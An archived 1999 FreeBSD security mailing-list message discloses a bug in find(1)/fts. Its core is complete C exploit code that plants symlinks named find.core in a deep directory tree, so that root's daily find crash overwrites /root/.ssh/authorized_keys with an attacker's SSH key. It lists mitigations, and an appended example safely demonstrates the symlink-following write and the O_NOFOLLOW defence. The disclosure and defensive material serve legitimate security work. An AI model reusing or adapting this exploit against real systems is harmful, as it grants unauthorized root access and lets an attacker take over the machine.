Date:        Wed, 25 Aug 1999 09:13:18 +0200 (CEST)
From:      Przemyslaw Frasunek <venglin@FreeBSD.lublin.pl>
To:        Rafal Banaszkiewicz <raf@tb-303.org>
Cc:        freebsd-security@freebsd.org
Subject:   RE: fts_print() , find and other stuff ?
Message-ID:  <XFMail.990825091318.venglin@FreeBSD.lublin.pl>
In-Reply-To: <Pine.BSF.3.95q.990825001835.16140A-100000@yucca.daewoo.lublin.pl>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 24-Aug-99 Rafal Banaszkiewicz wrote:

>       One of my friends has written sploit code for this bug? It's an old
> bug ... and it's still not fixed.

 Yes, this bug is quite easy to exploit. Find(1) runs every day from the
 /etc/security script. It segfaults when the directory tree is _very_ long,
 because of a junk pointer to the directory name.

 The core is created in one of the directories of our tree. But if find.core
 already exists, it's overwritten. It's possible to create a symlink from, e.g.,
 master.passwd or something else to find.core, and this file will be
 overwritten.

 Sample code below.

 BTW. Sorry for my poor English.

/*

 (c) 1999 babcia padlina ltd. <babunia@FreeBSD.lublin.pl>

 A bug in the fts libc functions allows overwriting any file in the system
 when the /etc/security script runs (it is executed from the 'daily' scripts).

 affected systems:
   - freebsd (all versions)
   - probably openbsd/netbsd

 fix:
   - limit root's coredump size
   - patch libc

*/

#include <stdio.h>
#include <errno.h>
#include <sys/stat.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

/* Directory name used as one component of the deep tree. The surrounding
 * newlines make the key text appear on a line of its own inside find's core
 * image, and therefore inside the file the core dump overwrites; a 512-bit
 * SSH1 key keeps the line short enough to be a filename component. */
#define STRING          "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
/* File to be clobbered by the core dump. */
#define FILE            "/root/.ssh/authorized_keys"
/* Name under which the kernel writes find(1)'s core file. */
#define CORE            "find.core"
/* Number of STRING/filler directory pairs to nest. */
#define DEPTH           300
#define BUFSIZE         250

/* Create directory `dir`, descend into it, and plant the symlink
 * linkto -> linkfrom there. Returns 0 on success, -1 on any failure. */
int makedir(const char *dir, const char *linkfrom, const char *linkto)
{

        if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
                return -1;

        if (chdir(dir))
                return -1;

        if (symlink(linkfrom, linkto) < 0)
                return -1;

        return 0;
}


int main(void)
{
        int i = 0;
        char pid[16], buf[BUFSIZE];

        /* Top of the tree: a directory named after our pid. */
        snprintf(pid, sizeof pid, "%d", getpid());

        if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
        {
                perror("mkdir()");
                return -1;
        }

        if (chdir(pid))
        {
                perror("chdir()");
                return -1;
        }

        /* Filler component: BUFSIZE-1 bytes of 'A', to grow the path quickly. */
        bzero(buf, BUFSIZE);
        memset(buf, 0x41, BUFSIZE-1);

        /* Alternate key-line and filler directories until the full path is far
         * longer than find(1) copes with; every level carries a find.core
         * symlink pointing at the target, so wherever find dumps core, the
         * core goes through the link. */
        for(i=0;i<DEPTH;i++)
        {
                if (makedir(STRING, FILE, CORE) < 0)
                {
                        perror("makedir()");
                        return -1;
                }

                if(makedir(buf, FILE, CORE) < 0)
                {
                        perror("makedir()");
                        return -1;
                }
        }

        return 0;
}


- ---
* Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 *
* Inet: venglin@FreeBSD.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQA/AwUBN8OXjf6SPyHAYTvjEQJ+lACcCWAsD7aIv+PNIUiCZHx7CBVbDrQAnR9J
JK6j0fxD4ht9nmHTtYZTLPBe
=frln
-----END PGP SIGNATURE-----
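The file-overwrite primitive the message relies on, isolated as an added example (this is not the exploit above and not FreeBSD's own core-dump code): a privileged writer that creates or truncates "find.core" in the current directory will follow a symlink of that name and rewrite whatever it points at, while a writer that opens with O_NOFOLLOW refuses. The example runs entirely as the calling user inside a temporary directory under /tmp, with a file named `secret` standing in for /root/.ssh/authorized_keys; the names, the temp-dir location and the `demo()` helper are assumptions of this example.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>

/* Write `data` to `path` the way a naive core writer does: create or
 * truncate, and follow a symlink if `path` is one. Returns 0 on success. */
static int write_following(const char *path, const char *data)
{
        size_t len = strlen(data);
        int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
        if (fd < 0)
                return -1;
        ssize_t n = write(fd, data, len);
        close(fd);
        return (n >= 0 && (size_t)n == len) ? 0 : -1;
}

/* Hardened writer: O_NOFOLLOW makes open() fail instead of following a
 * symlink in the final path component, so a planted link cannot redirect
 * the write. (O_EXCL, refusing any pre-existing entry, is the alternative.) */
static int write_nofollow(const char *path, const char *data)
{
        size_t len = strlen(data);
        int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC | O_NOFOLLOW, 0600);
        if (fd < 0)
                return -1;
        ssize_t n = write(fd, data, len);
        close(fd);
        return (n >= 0 && (size_t)n == len) ? 0 : -1;
}

/* Read up to cap-1 bytes of `path` into buf, NUL-terminated.
 * Returns the byte count or -1. */
static ssize_t read_file(const char *path, char *buf, size_t cap)
{
        int fd = open(path, O_RDONLY);
        if (fd < 0)
                return -1;
        ssize_t n = read(fd, buf, cap - 1);
        close(fd);
        if (n < 0)
                return -1;
        buf[n] = '\0';
        return n;
}

/* Run the scenario in a fresh temporary directory (assumed writable /tmp).
 * Returns 0 when the naive writer clobbered the target through the link and
 * the hardened writer left it alone; any other value names the failed step. */
int demo(void)
{
        char tmpl[] = "/tmp/coredemo.XXXXXX";
        char target[128], link[128], buf[64];
        int rc = 0;

        if (mkdtemp(tmpl) == NULL)
                return 1;
        snprintf(target, sizeof target, "%s/secret", tmpl);
        snprintf(link, sizeof link, "%s/find.core", tmpl);

        /* The victim file stands in for /root/.ssh/authorized_keys. */
        if (write_nofollow(target, "original\n") != 0)
                rc = 2;
        /* The attacker plants find.core -> secret where the privileged
         * process will dump core. */
        else if (symlink(target, link) != 0)
                rc = 3;
        /* A writer that follows symlinks overwrites the victim. */
        else if (write_following(link, "planted\n") != 0)
                rc = 4;
        else if (read_file(target, buf, sizeof buf) < 0
                 || strcmp(buf, "planted\n") != 0)
                rc = 5;
        /* The hardened writer must fail (ELOOP on Linux, EMLINK on FreeBSD)... */
        else if (write_nofollow(link, "again\n") == 0)
                rc = 6;
        /* ...and leave the victim exactly as it was. */
        else if (read_file(target, buf, sizeof buf) < 0
                 || strcmp(buf, "planted\n") != 0)
                rc = 7;

        unlink(link);
        unlink(target);
        rmdir(tmpl);
        return rc;
}

int main(void)
{
        int rc = demo();
        if (rc == 0)
                printf("symlink was followed by the naive writer; O_NOFOLLOW blocked it\n");
        else
                printf("unexpected result at step %d\n", rc);
        return rc;
}
```

The two mitigations the message's comment block lists map onto this: limiting root's core size stops the write from happening at all, and a kernel or libc that opens the core file without following symlinks removes the redirection even when a core is written.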


Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?XFMail.990825091318.venglin>